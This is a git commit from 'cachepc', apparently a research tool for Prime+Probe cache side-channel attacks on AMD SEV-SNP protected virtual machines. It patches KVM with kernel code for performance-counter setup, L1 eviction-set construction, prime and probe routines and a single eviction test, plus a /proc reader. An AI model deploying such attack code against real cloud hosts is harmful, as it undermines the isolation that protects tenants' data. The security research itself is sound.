cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc

commit 8dc6462e70009c0bbcf0bbfcfd2d4494d3772580
parent 2558cb66b59aae1578fc46ff8edf5d7cf9383037
Author: Louis Burda <quent.burda@gmail.com>
Date:   Tue, 26 Jul 2022 17:16:10 +0200

Single eviction test with sleep

Diffstat:
M .gitignore | 1 +
M Makefile | 9 +++++++++
M patch.diff | 80 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------
A read.c | 31 +++++++++++++++++++++++++++++++
M src/asm.h | 46 ++++++++++++++++++++++++++++++++++------------
M src/cachepc.c | 170 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++--------
M src/cachepc.h | 137 ++++++++++++++++++++++++++++++++++++++++++++++++++++----------------------------
7 files changed, 374 insertions(+), 100 deletions(-)

diff --git a/.gitignore b/.gitignore
@@ -2,3 +2,4 @@ build.sh
 push.sh
 *.o.cmd
 *.o
+read
diff --git a/Makefile b/Makefile
@@ -26,3 +26,12 @@ load:
 	sudo rmmod kvm || true
 	sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm.ko
 	sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm-amd.ko
+
+read: read.c
+	$(CC) -o $@ $<
+
+test: load read
+	@./read
+
+update:
+	git -C $(KERNEL_SOURCE) diff > patch.diff
diff --git a/patch.diff b/patch.diff
@@ -81,7 +81,7 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644
 }
 diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
-index 2541a17ff1c4..c219a214d904 100644
+index 2541a17ff1c4..757128b13fe5 100644
 --- a/virt/kvm/kvm_main.c
 +++ b/virt/kvm/kvm_main.c
 @@ -51,6 +51,9 @@
@@ -103,21 +103,26 @@ index 2541a17ff1c4..c219a214d904 100644
  MODULE_AUTHOR("Qumranet");
  MODULE_LICENSE("GPL");
-@@ -143,6 +148,13 @@ static void hardware_disable_all(void);
+@@ -143,6 +148,18 @@ static void hardware_disable_all(void);
  static void kvm_io_bus_destroy(struct kvm_io_bus *bus);
 +struct proc_ops cachepc_proc_ops;
 +
-+uint8_t *cachepc_msrmts;
-+size_t cachepc_msrmts_count;
++uint16_t *cachepc_msrmts;
++size_t cachepc_msrmts_count;
 +EXPORT_SYMBOL(cachepc_msrmts);
 +EXPORT_SYMBOL(cachepc_msrmts_count);
 +
++cache_ctx *cachepc_ctx;
++cacheline *cachepc_ds;
++EXPORT_SYMBOL(cachepc_ctx);
++EXPORT_SYMBOL(cachepc_ds);
++
  __visible bool kvm_rebooting;
  EXPORT_SYMBOL_GPL(kvm_rebooting);
-@@ -4765,6 +4777,50 @@ static void check_processor_compat(void *data)
+@@ -4765,12 +4782,94 @@ static void check_processor_compat(void *data)
  *c->ret = kvm_arch_check_processor_compat(c->opaque);
  }
 +kvm_cachepc_read(struct file *file, char *buf, size_t buflen, loff_t *off)
 +{
 +	size_t len, left;
++	size_t size;
 +
 +	printk(KERN_WARNING "CacheSC: Reading entries (%lu:%lli)\n",
 +		buflen, off ? *off : 0);
 +
-+	if (!off || *off >= cachepc_msrmts_count || *off < 0)
++	size = cachepc_msrmts_count * sizeof(uint16_t);
++	if (!off || *off >= size || *off < 0)
 +		return 0;
 +
-+	len = cachepc_msrmts_count - *off;
++	len = size - *off;
 +	if (len > buflen) len = buflen;
 +
 +	left = copy_to_user(buf, cachepc_msrmts + *off, len);
 +	return 0;
 +}
 +
++void
++kvm_cachepc_single_eviction_test(void *p)
++{
++	cacheline *head;
++	cacheline *ptr;
++
++	ptr = cachepc_prepare_victim(cachepc_ctx, 5);
++	head = cachepc_prime(cachepc_ds);
++	cachepc_victim(ptr);
++	cachepc_probe(head);
++
++	printk(KERN_WARNING "CachePC: Test done, results:");
++	cachepc_print_msrmts(head);
++	cachepc_save_msrmts(head);
++
++	cachepc_release_victim(cachepc_ctx, ptr);
++}
++
++void
++kvm_cachepc_init(void *p)
++{
++	int cpu;
++
++	cpu = get_cpu();
++
++	printk(KERN_WARNING "CachePC: Running on core %i\n", cpu);
++
++	cachepc_init_counters();
++
++	cachepc_ctx = cachepc_get_ctx(L1);
++	cachepc_ds = cachepc_prepare_ds(cachepc_ctx);
++
++	kvm_cachepc_single_eviction_test(p);
++
++	put_cpu();
++}
++
 int
 kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
 	  struct module *module)
 {
 	struct kvm_cpu_compat_check c;
-	int r;
-	int cpu;
+	int r, cpu;
 
 	r = kvm_arch_init(opaque);
 	if (r)
-@@ -4848,6 +4904,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+@@ -4848,6 +4947,20 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
 	r = kvm_vfio_ops_init();
 	WARN_ON(r);
 
-+	cachepc_init_counters();
-+
 +	cachepc_msrmts_count = L1_SETS;
-+	cachepc_msrmts = kzalloc(cachepc_msrmts_count, GFP_KERNEL);
++	cachepc_msrmts = kzalloc(cachepc_msrmts_count * sizeof(uint16_t), GFP_KERNEL);
 +	BUG_ON(cachepc_msrmts == NULL);
 +
++	r = smp_call_function_single(2, kvm_cachepc_init, NULL, true);
++	WARN_ON(r != 0);
++
 +	memset(&cachepc_proc_ops, 0, sizeof(cachepc_proc_ops));
 +	cachepc_proc_ops.proc_open = kvm_cachepc_open;
 +	cachepc_proc_ops.proc_read = kvm_cachepc_read;
 +	cachepc_proc_ops.proc_write = kvm_cachepc_write;
 +	cachepc_proc_ops.proc_release = kvm_cachepc_close;
-+
 +	proc_create("cachepc", 0644, NULL, &cachepc_proc_ops);
 
 	return 0;
 out_unreg:
-@@ -4872,6 +4942,9 @@ EXPORT_SYMBOL_GPL(kvm_init);
+@@ -4872,6 +4985,12 @@ EXPORT_SYMBOL_GPL(kvm_init);
 void kvm_exit(void)
 {
+	remove_proc_entry("cachepc", NULL);
+	kfree(cachepc_msrmts);
+
++	cachepc_release_ds(cachepc_ctx, cachepc_ds);
++	cachepc_release_ctx(cachepc_ctx);
++
 	debugfs_remove_recursive(kvm_debugfs_dir);
 	misc_deregister(&kvm_dev);
 	kmem_cache_destroy(kvm_vcpu_cache);
diff --git a/read.c b/read.c
@@ -0,0 +1,31 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <stdint.h>
+#include <assert.h>
+#include <unistd.h>
+
+int
+main(int argc, const char **argv)
+{
+	uint16_t counts[64];
+	size_t i, len;
+	int fd;
+
+	fd = open("/proc/cachepc", O_RDONLY);
+	len = read(fd, counts, sizeof(counts));
+	assert(len == sizeof(counts));
+
+	for (i = 0; i < 64; i++) {
+		if (i % 16 == 0 && i)
+			printf("\n");
+		if (counts[i] > 0)
+			printf("\x1b[91m");
+		printf("%2i ", i);
+		if (counts[i] > 0)
+			printf("\x1b[0m");
+	}
+	printf("\n");
+
+	close(fd);
+}
diff --git a/src/asm.h b/src/asm.h
@@ -19,6 +19,12 @@ static inline void cachepc_sfence(void);
 __attribute__((always_inline))
 static inline void cachepc_mfence(void);
 
+__attribute__((always_inline))
+static inline void cachepc_readq(void *p);
+
+__attribute__((always_inline))
+static inline void cachepc_victim(void *p);
+
 uint64_t
 cachepc_readpmc(uint64_t event)
 {
@@ -46,26 +52,42 @@ cachepc_cpuid(void)
 void
 cachepc_lfence(void)
 {
-    asm volatile(
-        "lfence\n\t"
-        ::
-    );
+	asm volatile(
+		"lfence\n\t"
+		::
+	);
 }
 
 void
 cachepc_sfence(void)
 {
-    asm volatile(
-        "sfence\n\t"
-        ::
-    );
+	asm volatile(
+		"sfence\n\t"
+		::
+	);
 }
 
 void
 cachepc_mfence(void)
 {
-    asm volatile(
-        "mfence\n\t"
-        ::
-    );
+	asm volatile(
+		"mfence\n\t"
+		::
+	);
+}
+
+void
+cachepc_readq(void *p)
+{
+	asm volatile (
+		"movq (%0), %%r10\n\t"
+		: : "r" (p) : "r10"
+	);
+}
+
+void
+cachepc_victim(void *p)
+{
+	cachepc_mfence();
+	cachepc_readq(p);
 }
diff --git a/src/cachepc.c b/src/cachepc.c
@@ -1,5 +1,10 @@
 #include "cachepc.h"
 
+static void cl_insert(cacheline *last_cl, cacheline *new_cl);
+static void *remove_cache_set(cache_ctx *ctx, void *ptr);
+static void *remove_cache_group_set(void *ptr);
+
+static cacheline *prepare_cache_set_ds(cache_ctx *ctx, uint32_t *set, uint32_t sets_len);
 static cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cacheline_ptr_arr);
 static void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr);
 static cacheline **allocate_cache_ds(cache_ctx *ctx);
@@ -9,7 +14,7 @@ static void *aligned_alloc(size_t alignment, size_t size);
 void
 cachepc_init_counters(void)
 {
-	uint32_t event, event_no, event_mask;
+	uint64_t event, event_no, event_mask;
 	uint64_t reg_addr;
 
 	/* SEE: https://developer.amd.com/resources/developer-guides-manuals (PPR 17H 31H, P.166)
@@ -20,22 +25,24 @@ cachepc_init_counters(void)
 	 * 6 slots total
 	 */
 
-	reg_addr = 0xc0010200; /* first slot */
+	reg_addr = 0xc0010200;
 	event_no = 0x64;
 	event_mask = 0x08;
 	event = event_no | (event_mask << 8);
-	event |= (1<< 17); /* OsUserMode bit */
-	event |= (1 << 22); /* enable performance counter */
-	printk(KERN_WARNING "CachePC: Initialized event %d\n", event);
+	event |= (1ULL << 17); /* OS (kernel) events only */
+	event |= (1ULL << 22); /* enable performance counter */
+	event |= (1ULL << 40); /* Host events only */
+	printk(KERN_WARNING "CachePC: Initialized event %llu\n", event);
 	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
 
 	reg_addr = 0xc0010202;
 	event_no = 0x64;
-	event_mask = 0xC8;
+	event_mask = 0xF0;
 	event = event_no | (event_mask << 8);
-	event |= (1 << 17); /* OsUserMode bit */
-	event |= (1 << 22); /* enable performance counter */
-	printk(KERN_WARNING "CachePC: Initialized event %d\n", event);
+	event |= (1ULL << 17); /* OS (kernel) events only */
+	event |= (1ULL << 22); /* enable performance counter */
+	event |= (1ULL << 40); /* Host events only */
+	printk(KERN_WARNING "CachePC: Initialized event %llu\n", event);
 	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
 }
 
@@ -74,6 +81,13 @@ cachepc_get_ctx(cache_level cache_level)
 	return ctx;
 }
 
+void
+cachepc_release_ctx(cache_ctx *ctx)
+{
+	kfree(ctx);
+}
+
+
 /*
  * Initialises the complete cache data structure for the given context
  */
@@ -95,6 +109,42 @@ cachepc_prepare_ds(cache_ctx *ctx)
 }
 
 void
+cachepc_release_ds(cache_ctx *ctx, cacheline *ds)
+{
+	kfree(remove_cache_set(ctx, ds));
+}
+
+cacheline *
+cachepc_prepare_victim(cache_ctx *ctx, uint32_t set)
+{
+	cacheline *victim_set, *victim_cl;
+	cacheline *curr_cl, *next_cl;
+
+	victim_set = prepare_cache_set_ds(ctx, &set, 1);
+	victim_cl = victim_set;
+
+	// Free the other lines in the same set that are not used.
+	if (ctx->addressing == PHYSICAL) {
+		curr_cl = victim_cl->next;
+		do {
+			next_cl = curr_cl->next;
+			// Here, it is ok to free them directly, as every line in the same
+			// set is from a different page anyway.
+			kfree(remove_cache_group_set(curr_cl));
+			curr_cl = next_cl;
+		} while(curr_cl != victim_cl);
+	}
+
+	return victim_cl;
+}
+
+void
+cachepc_release_victim(cache_ctx *ctx, cacheline *victim)
+{
+	kfree(remove_cache_set(ctx, victim));
+}
+
+void
 cachepc_save_msrmts(cacheline *head)
 {
 	cacheline *curr_cl;
@@ -126,23 +176,109 @@ cachepc_print_msrmts(cacheline *head)
 	} while (curr_cl != head);
 }
+
+cacheline *
+prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
+{
+	cacheline *cache_ds, **first_cl_in_sets, **last_cl_in_sets;
+	cacheline *to_del_cls, *curr_cl, *next_cl, *cache_set_ds;
+	uint32_t i, cache_groups_len, cache_groups_max_len;
+	uint32_t *cache_groups;
+
+	cache_ds = cachepc_prepare_ds(ctx);
+
+	first_cl_in_sets = kzalloc(ctx->sets * sizeof(cacheline *), GFP_KERNEL);
+	BUG_ON(first_cl_in_sets == NULL);
+
+	last_cl_in_sets = kzalloc(ctx->sets * sizeof(cacheline *), GFP_KERNEL);
+	BUG_ON(last_cl_in_sets == NULL);
+
+	// Find the cache groups that are used, so that we can delete the other ones
+	// later (to avoid memory leaks)
+	cache_groups_max_len = ctx->sets / CACHE_GROUP_SIZE;
+	cache_groups = kmalloc(cache_groups_max_len * sizeof(uint32_t), GFP_KERNEL);
+	BUG_ON(cache_groups == NULL);
+
+	cache_groups_len = 0;
+	for (i = 0; i < sets_len; ++i) {
+		if (!is_in_arr(sets[i] / CACHE_GROUP_SIZE, cache_groups, cache_groups_len)) {
+			cache_groups[cache_groups_len] = sets[i] / CACHE_GROUP_SIZE;
+			++cache_groups_len;
+		}
+	}
+
+	to_del_cls = NULL;
+	curr_cl = cache_ds;
+
+	// Extract the partial data structure for the cache sets and ensure correct freeing
+	do {
+		next_cl = curr_cl->next;
+
+		if (IS_FIRST(curr_cl->flags)) {
+			first_cl_in_sets[curr_cl->cache_set] = curr_cl;
+		}
+		if (IS_LAST(curr_cl->flags)) {
+			last_cl_in_sets[curr_cl->cache_set] = curr_cl;
+		}
+
+		if (ctx->addressing == PHYSICAL && !is_in_arr(
+			curr_cl->cache_set / CACHE_GROUP_SIZE, cache_groups, cache_groups_len))
+		{
+			// Already free all unused blocks of the cache ds for physical
+			// addressing, because we loose their refs
+			cl_insert(to_del_cls, curr_cl);
+			to_del_cls = curr_cl;
+		}
+		curr_cl = next_cl;
+
+	} while(curr_cl != cache_ds);
+
+	// Fix partial cache set ds
+	for (i = 0; i < sets_len; ++i) {
+		last_cl_in_sets[sets[i]]->next = first_cl_in_sets[sets[(i + 1) % sets_len]];
+		first_cl_in_sets[sets[(i + 1) % sets_len]]->prev = last_cl_in_sets[sets[i]];
+	}
+	cache_set_ds = first_cl_in_sets[sets[0]];
+
+	// Free unused cache lines
+	if (ctx->addressing == PHYSICAL) {
+		cachepc_release_ds(ctx, to_del_cls);
+	}
+
+	kfree(first_cl_in_sets);
+	kfree(last_cl_in_sets);
+	kfree(cache_groups);
+
+	return cache_set_ds;
+}
+
+void
+cl_insert(cacheline *last_cl, cacheline *new_cl)
+{
+	if (last_cl == NULL) {
+		// Adding the first entry is a special case
+		new_cl->next = new_cl;
+		new_cl->prev = new_cl;
+	} else {
+		new_cl->next = last_cl->next;
+		new_cl->prev = last_cl;
+		last_cl->next->prev = new_cl;
+		last_cl->next = new_cl;
+	}
+}
+
 void *
 remove_cache_set(cache_ctx *ctx, void *ptr)
 {
 	return (void *) (((uintptr_t) ptr) & ~SET_MASK(ctx->sets));
 }
 
-void
-cachepc_release_ds(cache_ctx *ctx, cacheline *ds)
+void *
+remove_cache_group_set(void *ptr)
 {
-	kfree(remove_cache_set(ctx, ds));
+	return (void *) (((uintptr_t) ptr) & ~SET_MASK(CACHE_GROUP_SIZE));
 }
 
-void
-cachepc_release_ctx(cache_ctx *ctx)
-{
-	kfree(ctx);
-}
 
 /*
  * Create a randomized doubly linked list with the following structure:
diff --git a/src/cachepc.h b/src/cachepc.h
@@ -3,22 +3,28 @@
 #include <linux/kernel.h>
 #include <linux/types.h>
 #include <linux/slab.h>
+#include <linux/delay.h>
 
 #include "asm.h"
 #include "cache_types.h"
 #include "util.h"
 
-#define L2_HIT_CNTR 0xC0010201
-#define L2_MISS_CNTR 0xC0010203
+#define L2_MISS_CNTR 0xC0010201
+#define L2_HIT_CNTR 0xC0010203
 
 void cachepc_init_counters(void);
 
 cache_ctx *cachepc_get_ctx(cache_level cl);
+void cachepc_release_ctx(cache_ctx *ctx);
+
 cacheline *cachepc_prepare_ds(cache_ctx *ctx);
+void cachepc_release_ds(cache_ctx *ctx, cacheline *ds);
+
+cacheline *cachepc_prepare_victim(cache_ctx *ctx, uint32_t set);
+void cachepc_release_victim(cache_ctx *ctx, cacheline *ptr);
+
 void cachepc_save_msrmts(cacheline *head);
 void cachepc_print_msrmts(cacheline *head);
-void cachepc_release_ds(cache_ctx *ctx, cacheline *ds);
-void cachepc_release_ctx(cache_ctx *ctx);
 
 __attribute__((always_inline))
 static inline cacheline *cachepc_prime(cacheline *head);
@@ -26,20 +32,23 @@ static inline cacheline *cachepc_prime(cacheline *head);
 __attribute__((always_inline))
 static inline cacheline *cachepc_prime_rev(cacheline *head);
 
-__attribute__((always_inline))
-static inline cacheline *cachepc_probe_set(cacheline *curr_cl);
+//__attribute__((always_inline))
+//static inline cacheline *cachepc_probe_set(cacheline *curr_cl);
 
 __attribute__((always_inline))
 static inline cacheline *cachepc_probe(cacheline *head);
 
-extern uint8_t *cachepc_msrmts;
+extern uint16_t *cachepc_msrmts;
 extern size_t cachepc_msrmts_count;
 
+extern cache_ctx *cachepc_ctx;
+extern cacheline *cachepc_ds;
+
 /*
  * Prime phase: fill the target cache (encoded in the size of the data structure)
  * with the prepared data structure, i.e. with attacker data.
 */
-static inline cacheline *
+cacheline *
 cachepc_prime(cacheline *head)
 {
 	cacheline *curr_cl;
@@ -73,7 +82,7 @@ cachepc_prime(cacheline *head)
  * A) An evicted set is L2_ACCESS_TIME - L1_ACCESS_TIME slower
  * B) An evicted set is L3_ACCESS_TIME - L2_ACCESS_TIME slower
  */
-static inline cacheline *
+cacheline *
 cachepc_prime_rev(cacheline *head)
 {
 	cacheline *curr_cl;
@@ -89,61 +98,73 @@ cachepc_prime_rev(cacheline *head)
 	return curr_cl->prev;
 }
 
-static inline cacheline *
-cachepc_probe_set(cacheline *curr_cl)
+cacheline *
+cachepc_probe(cacheline *start_cl)
 {
 	uint64_t pre1, pre2;
 	uint64_t post1, post2;
 	cacheline *next_cl;
+	cacheline *curr_cl;
 
-	pre1 = cachepc_readpmc(L2_HIT_CNTR);
-	pre2 = cachepc_readpmc(L2_MISS_CNTR);
-
-	cachepc_mfence();
-	asm volatile(
-		"mov 8(%[curr_cl]), %%rax \n\t"              // +8
-		"mov 8(%%rax), %%rcx \n\t"                   // +16
-		"mov 8(%%rcx), %%rax \n\t"                   // +24
-		"mov 8(%%rax), %%rcx \n\t"                   // +32
-		"mov 8(%%rcx), %%rax \n\t"                   // +40
-		"mov 8(%%rax), %%rcx \n\t"                   // +48
-		"mov 8(%%rcx), %[curr_cl_out] \n\t"          // +56
-		"mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64
-		: [next_cl_out] "=r" (next_cl),
-		  [curr_cl_out] "=r" (curr_cl)
-		: [curr_cl] "r" (curr_cl)
-		: "rax", "rcx"
-	);
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	post1 = cachepc_readpmc(L2_HIT_CNTR);
-	cachepc_cpuid();
-	post2 = cachepc_readpmc(L2_MISS_CNTR);
-	cachepc_cpuid();
-
-	/* works across size boundary */
-	curr_cl->count = 0;
-	curr_cl->count += post1 - pre1;
-	curr_cl->count += post2 - pre2;
-
-	return next_cl;
-}
+	curr_cl = start_cl;
 
-static inline cacheline *
-cachepc_probe(cacheline *head)
-{
-	cacheline *curr_cs;
-
-	//printk(KERN_WARNING "CachePC: Probing..");
-
-	curr_cs = head;
 	do {
-		curr_cs = cachepc_probe_set(curr_cs);
-	} while (__builtin_expect(curr_cs != head, 1));
-
-	//printk(KERN_WARNING "CachePC: Probing done");
-
-	return curr_cs->next;
+		cachepc_cpuid();
+		cachepc_mfence();
+
+		asm volatile(
+			"mov 8(%[curr_cl]), %%rax \n\t"              // +8
+			"mov 8(%%rax), %%rcx \n\t"                   // +16
+			"mov 8(%%rcx), %%rax \n\t"                   // +24
+			"mov 8(%%rax), %%rcx \n\t"                   // +32
+			"mov 8(%%rcx), %%rax \n\t"                   // +40
+			"mov 8(%%rax), %%rcx \n\t"                   // +48
+			"mov 8(%%rcx), %[curr_cl_out] \n\t"          // +56
+			"mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64
+			: [next_cl_out] "=r" (next_cl),
+			  [curr_cl_out] "=r" (curr_cl)
+			: [curr_cl] "r" (curr_cl)
+			: "rax", "rcx"
+		);
+
+		cachepc_cpuid();
+		cachepc_mfence();
+
+		pre1 = cachepc_readpmc(L2_HIT_CNTR);
+		pre2 = cachepc_readpmc(L2_MISS_CNTR);
+
+		cachepc_cpuid();
+		cachepc_mfence();
+
+		msleep(100);
+
+		post1 = cachepc_readpmc(L2_HIT_CNTR);
+		cachepc_cpuid();
+		post2 = cachepc_readpmc(L2_MISS_CNTR);
+		cachepc_cpuid();
+
+		/* works across size boundary */
+		curr_cl->count = 0;
+		curr_cl->count += post1 - pre1;
+		curr_cl->count += post2 - pre2;
+	} while (__builtin_expect(curr_cl != start_cl, 1));
+
+	return curr_cl->next;
 }
+
+// static inline cacheline *
+// cachepc_probe(cacheline *head)
+// {
+// 	cacheline *curr_cs;
+//
+// 	//printk(KERN_WARNING "CachePC: Probing..");
+//
+// 	curr_cs = head;
+// 	do {
+// 		curr_cs = cachepc_probe_set(curr_cs);
+// 	} while (__builtin_expect(curr_cs != head, 1));
+//
+// 	//printk(KERN_WARNING "CachePC: Probing done");
+//
+// 	return curr_cs->next;
+// }